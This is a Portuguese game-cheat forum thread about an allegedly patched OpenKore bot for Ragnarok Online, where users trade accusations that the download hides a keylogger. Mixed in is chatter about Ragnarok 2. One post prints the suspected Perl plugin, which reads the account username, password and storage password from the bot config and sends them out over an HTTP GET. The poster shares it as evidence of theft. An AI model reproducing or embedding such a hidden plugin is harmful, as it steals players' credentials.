Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

patched OpenKore Oficial WebCheats

Posts Recomendados

s, infelizmente...

ano que vem (tomara) já estarei na faculdade, mas acho que não vou parar de jogar por causa disso.

daqui a 3 anos já deve ter lançado o ragnarok 2 BR e esse eu acho que não será da lug, pelo menos não se a gravity ligar para a opinião de quem paga o salário deles (nós).

esse novo jogo seria tipo uma "atualização nos gráficos" e uma nova história, pq a história que nós temos já está ficando muito grande e isso dificulta para novod jogadores. me falaram q esse novo jogo se passaria alguns anos no futuro comparado com o ragnarok 1

se o picor acontecer, com ctz teremos privates muito semelhantes ao server coreano e poderemos jogar tranquilos

Link para o comentário
Compartilhar em outros sites

não sei achar keyllogers,mais que existe varias maneiras de pegar as senha de quem usa o bot existe,vi um jeito de um membro de um forum de hacker chamado Kao,ele tinha desenvolvido um meio muito dificil de ser descuberto,so quem viu a videoaula dele sabe como descobrir,quem não garante que esse dono do topico pode ser esse cara ou até mesmo está usando o metodo parecido ou até igual,so sei que tomei um maravilhoso HACK depois que loguei meus 2 chares nesse openkore,é dificil achar honestidade aqui

Link para o comentário

cara, se você diz ter keyloger aqui, APRENDA A ACHAR E ACHE, KRL

@simp ; quando rag 2 sair, você me chama que nois joga junto :3

sério, ragnarok, seilá. véi, muito longa a historia.

e a maioria das pessoas jogam só o rpg e não ligam pra historia. vê quantos que sabem a historia de cada cidade ? VÊ !

Link para o comentário

eu só sei a de payon, morroc, geffen, gastlhein, geffenia e prontera por causa do anime...

as outras eu sei por causa das quests, tipo juno é a cidade dos sábios, lightizen é a cidade dos mais ricos e dos mais pobres, eimbroch é uma cidade mineradora, etc

não sei a de aldebaran (só que é a central das kafras) não sei a de hugel nem rachel

quero ver quem sabe a história do MVP thanatos (eu sei)

Link para o comentário

eu sei até a da academia de kiel , que é do mlk lá que chamava kihel , dono do laboratorio bla bla bla.

das cidades eu sei até a do novo mundo ( splendide / manuk { em ordem dos episódios } )

to aqui procurando a do thanatos que fiquei curioso *u*

@topic ~;

VOU FAZER UM CONCURSO.

QUEM ACHAR A PORRA DO KL NESSA BÊCÊTÊ EU VOU DAR A MJOLL DO MEU PP OK ?

Link para o comentário

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

kkkkkkkkk

ta ai o kl. veio do openkore desse site aqui:

está num plugin oculto na pasta plugins.

onde está meu mjol??

XD

Link para o comentário

desse aí a pasta do openkore já tá escrito que é keylogger UHAUEHAUHEUAHEUHAUEHUAEH

nau, nau vou dar minha mjollnir u-u

@topic;

alguém podia fazer um topico de onde upar com e sem slave né ? *u*

Link para o comentário

ragnarok 2 há tempos que está desatualizado e seu desenvolvimento encontra-se parado e sem qualquer previsão de término ou de retomada do projeto pela Gravity, sendo que existem apenas servidores de testes. Ou seja, qualquer empresa que tenha vontade de desenvolver o projeto, terá que revisar todas as ferramentas para as mais atuais e além disso, recomeçar toda base de dados do zero, o que inviabilizaria todo o processo de desenvolvimento pelo alto custo de adaptação, tempo e dinheiro.

Para se ter uma ideia, a engine que o ragnarok 2 usa é a mesma unreal tornament que esta disponível de graça.

Link para o comentário

@1Ridiculo1

isso refuta tudo o q vc disse.

as informaçoes que vc tem estão desatualizadas, o projeto do ragnarok 2 foi retomado ano passado e não usa mais a unreal engine (engine do unreal thounament), apesar dessa ser a engine mais popular por ai.

não sei mais o nome da engine do novo ragnarok 2, mas tbm é boa

a unreal engine 3 foi usada para fazer mortal kombat 9, god of war 3 dentre outros, e a unreal engine 4 foi votada a engine mais poderosa do mundo. não a subestime.

a versão grátis serve só pra estudo e se chama UDK (unreal devlopment kit), está atualizada com a versão UE3 e se vc fizer qualquer coisa na udk e vender, prepare-se pra ser processado

ragnarok - the legend of the second é a segunda tentativa de fazer a segunda versão do jogo, e essa parece que vai dar certo. tem sistema de atributos, montaria, kafra cartas, classes etc. ta mt manero.

ao contrário da primeira tentativa, essa tem uma história baseada no ragnarok 1, e uma jogabilidade semelhante, só adaptada aos gráficos (ficou tipo uma mistura de wow com rag)

tem até um pack de tradução parcial pra portugues e uma galera que joga, o problema é que pra se registrar tem que ter um tipo de CPF coreano q é difícil de achar, pq ele tem q realmente existir (vc tem q se passar por um coreano pra jogar...)

Link para o comentário

lol fico algumas horas off por estar na faculdade, e quando volto já está com coincidentemente com o mesmo tipo de escrita e argumentos que o sumaréviu me acusando de KL Oo...

Mais falar e muito fácil quero ver provar, coisa que ate hoje nenhum filho de uma prestadora de serviços sexuais fez *_*

Lipe Broll se for realmente parar quando asgard sair me da um aló que eu aceito com maior prazer seus equipes ou só diga o lugar e hora que vai joga-los no chão pra eu estar por perto. hehehe

Link para o comentário

cara, eu consegui um rg koreano em 2003, pra jogar o kRO, e consegui por um gerador na época que as melhores internets eram discadas, que nem dava pra usar o telefone quando estava na internet.

então, acho que isso não deve ser muito dificil

ah, acho que da pra transferir sua warportal pro kRO não dá ? (warportal = iRO etc )

e kd meu guia de up com bot ? :C

@edit;

saruesley,

pode deixar uaheuaheuhauheuaheuhau

Link para o comentário

@saruesley,

nãu, ainda nãu. ainda não tenho outra coisa pra fazer uaheuaheuahuehae

@simpson ;

véi, mas e o negocio da warp portal, não dá mais pra fazer conta no kRO com ela ?

@edit

simpson NÃO FAZ ESSE TUTORIAL SE NÃO VAI FICAR MAINSTREAM OS LUGARES DE UPAR AÍ FODDEU D:

só me diz onde eu upo lechando com um stk que só tem uma gladius lv 87 com uma suma cotoca lv 83 e um pp 84 UHAEUHAUEHUAHEUAHE

Link para o comentário

fica dificil seguir com as reclamações,são muitos flods para esconder as reclamações,e como sempre citando esse trouxa de araujo para disfocar o fato de estar roubando,você me furto e fica flodando com os outros para esconder as reclamações,fato que tem keylloger nisso,e os outros roubados se pronunciem também deve aver mais um monte!

Link para o comentário

meus deus!analizando todos os coments dos moderadores notei que quando fecha esse topico esse saruesley so falta ficar louco por esse forum para reabrirem,o cara deve estar faturando bastante com isso por isso o desespero,tudo se enchaixa agora,até um cego encherga isso

Link para o comentário

Não acha muito estranho só aparecer uns gatos pingados falando que foram hackeados?

E se eu fico correndo atras pra reabrirem o tópico ou não e problema meu, pois se eu deixar que fique fechado isso vai fazer com que desacreditem em mim e em tudo o que falei, toda vez que ele e reaberto ganho mais membros me apoiando.

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.